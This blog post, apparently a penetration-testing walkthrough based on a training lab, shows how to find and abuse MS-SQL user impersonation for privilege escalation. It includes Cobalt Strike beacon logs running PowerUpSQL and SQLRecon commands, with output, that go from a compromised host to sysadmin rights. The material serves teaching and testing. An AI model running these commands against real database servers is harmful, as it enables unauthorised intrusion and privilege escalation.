Impersonating MS-SQL user’s

Penentration Test Leave a comment

Hi Friends,

Lets explore the concept of database user impersonation to enhance your understanding of potential security threats. This technique can be leveraged for activities like privilege escalation and command execution, providing insights into advanced attack vectors in the cybersecurity domain

User Impersonation

User impersonation refers to a mechanism that allows a database user to temporarily assume the identity and permissions of another user or security context. This capability is often utilized for specific tasks or operations where the user requires elevated privileges beyond their own.

SQL Server provides the EXECUTE AS statement, which is a key component for implementing user impersonation. The statement allows a user to switch to another user or execute a module (such as a stored procedure or function) within the context of a different user.

Reconaisance

At the initiation of a cybersecurity incident, it is assumed that a significant initial foothold has been attained within the network, often through the compromise of a server or workstation. To facilitate reconnaissance, I will employ an application named SQLRecon and PowerSQLUp, designed to identify and locate impersonated user accounts.

Finding Database Instance

To initiate the reconnaissance process, the primary step involves gathering information to ascertain the presence of any Microsoft SQL (MS-SQL) databases within your network. For this purpose, I employ PowerUpSQL, a tool seamlessly integrated into the session to enhance its functionality within the Cobalt Strike framework.

[12/09 09:03:22] beacon> powershell-import /opt/PowerUpSQL/PowerUpSQL.ps1
[12/09 09:03:23] [*] Tasked beacon to import: /opt/PowerUpSQL/PowerUpSQL.ps1
[12/09 09:03:24] [+] host called home, sent: 202189 bytes
[12/09 09:04:15] beacon> powershell Get-SQLInstanceDomain
[12/09 09:04:15] [*] Tasked beacon to run: Get-SQLInstanceDomain
[12/09 09:04:15] [+] host called home, sent: 329 bytes
[12/09 09:04:19] [+] received output:

ComputerName     : sql-2.dev.***.io
Instance         : sql-2.dev.***.io,1433
DomainAccountSid : 1500000521000672332383313895871914512914091400
DomainAccount    : mssql_svc
DomainAccountCn  : MS SQL Service
Service          : MSSQLSvc
Spn              : MSSQLSvc/sql-2.dev.***.io:1433
LastLogon        : 1/24/2023 12:48 PM
Description      :

Finding Database Connection String

Advancing our reconnaissance process, it is imperative to extract additional information from the database. This entails acquiring details such as the server name where the database is hosted, the associated port, and evaluating the accessibility from the attacker’s machine 

[12/09 09:06:13] beacon> powershell Get-SQLConnectionTest -Instance "sql-2.dev.cyberbotic.io,1433" | fl
[12/09 09:06:13] [*] Tasked beacon to run: Get-SQLConnectionTest -Instance "sql-2.dev.cyberbotic.io,1433" | fl
[12/09 09:06:13] [+] host called home, sent: 449 bytes
[12/09 09:06:15] [+] received output:

ComputerName : sql-2.dev.***.io
Instance     : sql-2.dev.***.io,1433
Status       : Accessible

Finding Database Detail Information

We delve deeper into the database to extract comprehensive details, enabling us to pinpoint potential vulnerabilities specific to its version.

[12/09 09:07:53] beacon> powershell Get-SQLServerInfo -Instance "sql-2.dev.***.io,1433"
[12/09 09:07:53] [*] Tasked beacon to run: Get-SQLServerInfo -Instance "sql-2.dev.***.io,1433"
[12/09 09:07:53] [+] host called home, sent: 425 bytes
[12/09 09:07:56] [+] received output:

ComputerName           : sql-2.dev.***.io
Instance               : SQL-2
DomainName             : DEV
ServiceProcessID       : 4504
ServiceName            : MSSQLSERVER
ServiceAccount         : DEV\mssql_svc
AuthenticationMode     : Windows Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Standard Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : DEV\bfarmer
IsSysadmin             : No
ActiveSessions         : 1

Current Access Privilege

The subsequent steps involve a comprehensive analysis of the privileges bestowed upon us when connected to the server using the account associated with the operational beacon

[12/09 09:31:06] beacon> execute-assembly /opt/SharpCollection/SQLRecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io,1433 /m:whoami
[12/09 09:31:07] [*] Tasked beacon to run .NET program: SQLRecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io,1433 /m:whoami
[12/09 09:31:07] [+] host called home, sent: 307558 bytes
[12/09 09:31:09] [+] received output:
[*] Determining user permissions on sql-2.dev.***.io,1433
[*] Logged in as DEV\bfarmer
[*] Mapped to the user guest

[*] Roles:
 |-> User is a member of public role.
 |-> User is NOT a member of db_owner role.
 |-> User is NOT a member of db_accessadmin role.
 |-> User is NOT a member of db_securityadmin role.
 |-> User is NOT a member of db_ddladmin role.
 |-> User is NOT a member of db_backupoperator role.
 |-> User is NOT a member of db_datareader role.
 |-> User is NOT a member of db_datawriter role.
 |-> User is NOT a member of db_denydatareader role.
 |-> User is NOT a member of db_denydatawriter role.
 |-> User is NOT a member of sysadmin role.
 |-> User is NOT a member of setupadmin role.
 |-> User is NOT a member of serveradmin role.
 |-> User is NOT a member of securityadmin role.
 |-> User is NOT a member of processadmin role.
 |-> User is NOT a member of diskadmin role.
 |-> User is NOT a member of dbcreator role.
 |-> User is NOT a member of bulkadmin role.

Getting the account to Impersonate

We are checking what account that can be impersonated hence we can work on behalf of this account

[12/09 10:17:54] beacon> execute-assembly /opt/SharpCollection/SQLRecon.exe /a:wintoken /h:sql-2.dev.***.io,1433 /m:impersonate
[12/09 10:17:54] [*] Tasked beacon to run .NET program: SQLRecon.exe /a:wintoken /h:sql-2.dev.***.io,1433 /m:impersonate
[12/09 10:17:55] [+] host called home, sent: 307568 bytes
[12/09 10:17:57] [+] received output:
[*] Enumerating accounts that can be impersonated on sql-2.dev.***.io,1433

name | 
-------
DEV\mssql_svc |

Account Impersonating

Currently, the active state involves the impersonation of the “mssql_svc” account. The objective is to assess the extent of privileges conferred upon the present user context.

[12/09 10:23:15] beacon> execute-assembly /opt/SharpCollection/SQLRecon.exe /a:wintoken /h:sql-2.dev.***.io,1433 /m:iwhoami /i:DEV\mssql_svc
[12/09 10:23:16] [*] Tasked beacon to run .NET program: SQLRecon.exe /a:wintoken /h:sql-2.dev.***.io,1433 /m:iwhoami /i:DEV\mssql_svc
[12/09 10:23:16] [+] host called home, sent: 307606 bytes
[12/09 10:23:18] [+] received output:
[*] Determining user permissions on sql-2.dev.***.io,1433 as 'DEV\mssql_svc'

[*] Logged in as DEV\mssql_svc
[*] Mapped to the user dbo
[*] [+] Roles:

 |-> User is a member of public role.
 |-> User is NOT a member of db_owner role.
 |-> User is NOT a member of db_accessadmin role.
 |-> User is NOT a member of db_securityadmin role.
 |-> User is NOT a member of db_ddladmin role.
 |-> User is NOT a member of db_backupoperator role.
 |-> User is NOT a member of db_datareader role.
 |-> User is NOT a member of db_datawriter role.
 |-> User is NOT a member of db_denydatareader role.
 |-> User is NOT a member of db_denydatawriter role.
 |-> User is a member of sysadmin role.
 |-> User is a member of setupadmin role.
 |-> User is a member of serveradmin role.
 |-> User is a member of securityadmin role.
 |-> User is a member of processadmin role.
 |-> User is a member of diskadmin role.
 |-> User is a member of dbcreator role.
 |-> User is a member of bulkadmin role.

Leave a Reply